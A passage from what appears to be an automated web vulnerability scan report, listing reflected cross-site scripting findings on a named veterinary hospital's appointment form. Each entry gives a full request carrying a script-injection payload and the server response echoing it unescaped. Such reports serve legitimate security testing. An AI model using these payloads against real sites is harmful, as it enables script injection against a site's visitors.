ew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322) HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:46:22 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=utsbm26ngjhc03ls4mkecbg4h6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 23515

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<input type="hidden" name="uri" id="uri" value="http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AMd75d4"><script>alert(1)</script>ec5002bcf17&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterina
...[SNIP]...

2.93. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [appt_type parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /new-york-veterinary-hospital/appt.html

Issue detail

The value of the appt_type request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd652"><script>alert(1)</script>e99070fd4e0 was submitted in the appt_type parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=apptbd652"><script>alert(1)</script>e99070fd4e0&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d69ad90c98185c3bfbf109c1ee7f2ceae%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322) HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:46:29 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=1toj3kbv807ruru63hn2ttm475; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 23515

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<input type="hidden" name="uri" id="uri" value="http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=apptbd652"><script>alert(1)</script>e99070fd4e0&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&sub
...[SNIP]...

2.94. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [client parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /new-york-veterinary-hospital/appt.html

Issue detail

The value of the client request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd70d"><script>alert(1)</script>a6d35f88597 was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=currentbd70d"><script>alert(1)</script>a6d35f88597&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d69ad90c98185c3bfbf109c1ee7f2ceae%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322) HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:46:33 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=euqdou5q6pfmhvgk2m2b42b3p0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 23515

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<input type="hidden" name="uri" id="uri" value="http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=currentbd70d"><script>alert(1)</script>a6d35f88597&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+
...[SNIP]...

2.95. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [date1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /new-york-veterinary-hospital/appt.html

Issue detail

The value of the date1 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c1c6"><script>alert(1)</script>979dba9c0db was submitted in the date1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=8c1c6"><script>alert(1)</script>979dba9c0db&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d69ad90c98185c3bfbf109c1ee7f2ceae%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322) HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:46:38 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=gn0lqn96h1dui1eed4jku5k8m6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 23558

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<input name="date1" id="date1" type="text" size="20" maxlength="50" value="8c1c6"><script>alert(1)</script>979dba9c0db" class="datepicker" />
...[SNIP]...

2.96. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [date2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /new-york-veterinary-hospital/appt.html

Issue detail

The value of the date2 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96695"><script>alert(1)</script>9ca6b41fe54 was submitted in the date2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=96695"><script>alert(1)</script>9ca6b41fe54&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d69ad90c98185c3bfbf109c1ee7f2ceae%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322) HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:46:42 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=m28f2rol7ucndmddriq23vq4j7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 23558

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<input name="date2" id="date2" type="text" size="20" maxlength="50" value="96695"><script>alert(1)</script>9ca6b41fe54" class="datepicker" />
...[SNIP]...

2.97. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [date3 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /new-york-veterinary-hospital/appt.html

Issue detail

The value of the date3 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99fca"><script>alert(1)</script>838dd1f40b2 was submitted in the date3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=99fca"><script>alert(1)</script>838dd1f40b2&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d69ad90c98185c3bfbf109c1ee7f2ceae%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322) HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:46:53 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=4slqhv122b9dscf15gqhml0ng4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 23558

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<input name="date3" id="date3" type="text" size="20" maxlength="50" value="99fca"><script>alert(1)</script>838dd1f40b2" class="datepicker" />
...[SNIP]...

2.98. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [doctor parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /new-york-veterinary-hospital/appt.html

Issue detail

The value of the doctor request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23546"><script>alert(1)</script>3e62334127d was submitted in the doctor parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=23546"><script>alert(1)</script>3e62334127d&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d69ad90c98185c3bfbf109c1ee7f2ceae%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322) HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:46:57 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=rbfveb3tt0865o46p3m6n44jl1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 23515

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
pe="hidden" name="uri" id="uri" value="http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=23546"><script>alert(1)</script>3e62334127d&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&tim
...[SNIP]...

2.99. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [email parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /new-york-veterinary-hospital/appt.html

Issue detail

The value of the email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15a16"><script>alert(1)</script>b7c615c11f4 was submitted in the email parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

